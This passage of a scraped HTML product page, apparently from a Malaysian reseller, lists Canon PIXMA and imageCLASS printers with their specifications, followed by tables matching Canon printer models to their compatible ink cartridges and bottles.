100vw, 362px\" />											\n		<p>Refillable Ink Tank All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost.</p><p>Print, Scan, Copy and Fax</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode</p><p>Recommended print volume: 150 - 1500 pages</p><p>[maxbutton id=\"11\" ]</p>		\n			<h4>PIXMA G1010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank Printer for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print</p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) / 5.0ipm (colour)</p><p>Photo Speed (4 x 6\"): 60sec. (borderless)</p><p>[maxbutton id=\"11\" ]</p>		\n			<h4>PIXMA G3010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank Wireless All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, Scan &amp; Copy</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode</p><p>Recommended print volume: 150 - 1500 pages</p><p>[maxbutton id=\"11\" ]</p>		\n			<h3>Laser Printers :-</h3>		\n			<h4>imageCLASS LBP113w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<h4>Compact with wireless connectivity</h4><p>Simple to operate and compact in size, the ideal choice for your printing needs.</p><ul><li>Print</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>First Print Out Time (A4): Approx. 6.5 sec</li><li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li><li>Mobile Connectivity.</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF269dw</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>The Multifunction printing solution with Duplex Auto Document Feeder (DADF)</strong></p><p>Enjoy greater efficiency. With the duplex auto document feeder, ensure shorter copying and scanning times.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 28ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 5.2 sec</li><li>Max. paper input capacity: 251 sheets</li><li>Print resolution: 1,200 Ã— 1,200 dpi (equivalent)</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF266dn</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>The Multifunction printing solution with Mobile Printing and Network</strong></p><p>Featuring Network printing and SEND technology, MF266dn is the productive choice for your business operations.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 28ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 5.2 sec</li><li>Max. paper input capacity: 251 sheets</li><li>Print resolution: 1,200 Ã— 1,200 dpi (equivalent)</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF913w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact All-in-One with wireless connectivity, bundled with three toner cartridges</strong></p><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.</p><ul><li>Print, Scan, Copy</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 6.5 sec</li><li>Max. paper input capacity: Up to 150 sheets</li><li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF113w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact All-in-One with wireless connectivity</strong></p><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Equipped with built-in Wi-Fi and access point capability.</p><ul><li>Print, Scan, Copy</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 6.5 sec</li><li>Max. paper input capacity: Up to 150 sheets</li><li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS LBP913w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact with wireless connectivity, bundled with 3 cartridges</strong></p><p>Keep printing simple. The compact size fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.</p><ul><li>Print</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>First Print Out Time (A4): Approx. 6.5 sec</li><li>Print Resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li><li>Mobile Printing</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF525x</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Smarter way to improve office productivity and work efficiency. Equipped with innovative solution in a robust, compact design, the MF525x integrates seamlessly into busy offices and workgroups.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 43ppm</li><li>Recommended monthly print volume: 2,000 - 7,500 pages</li><li>FPOT: 6.2secs. (A4)</li><li>Max. paper input capacity: Up to 2,300 sheets</li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF426dw</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact 4-in-1 Black and White Multifunction for the smart business</strong></p><p>With cutting-edge features, the MF426dw is set to boost work productivity in the modern office.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 38ppm</li><li>Recommended monthly print volume: 750 - 4,000 pages</li><li>FPOT: 5.5secs. (A4)</li><li>Max. paper input capacity: Up to 900 sheets</li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h3>Cartridge Printers :-</h3>		\n		<table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>imagePROGRAF PRO-500</p></td><td width=\"208\"><p>Maintenance Cartridge MC-20</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY iB4170</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5070</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5170</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5370</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5470</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA E3170</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E410</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA E4270</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E470</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E477</p></td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E480</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E510</p></td><td width=\"208\"><p>CL-98 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-88 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E560</p></td><td width=\"208\"><p>CL-99 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-89 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E560 / E560R</p></td><td width=\"208\"><p>CL-99 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-89 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA G1000</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G1010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G2010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G3000</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G3010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G4010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP100</p></td><td width=\"208\"><p>CLI-36 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-35 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP110</p></td><td width=\"208\"><p>CLI-36 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-35 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP110 (with battery)</p></td><td width=\"208\"><p>CLI-36 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-35 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP1300</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA iP2770 / iP2772</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP2870S</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA iP4200</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP7270</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP8770</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iX6770</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-755XXL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iX6870</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-755XXL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG2570S</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG2577S</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MG3570</p></td><td width=\"208\"><p>CL-741 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-741XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740/CL-741 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG3670</p></td><td width=\"208\"><p>CL-741 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-741XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740/CL-741 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA 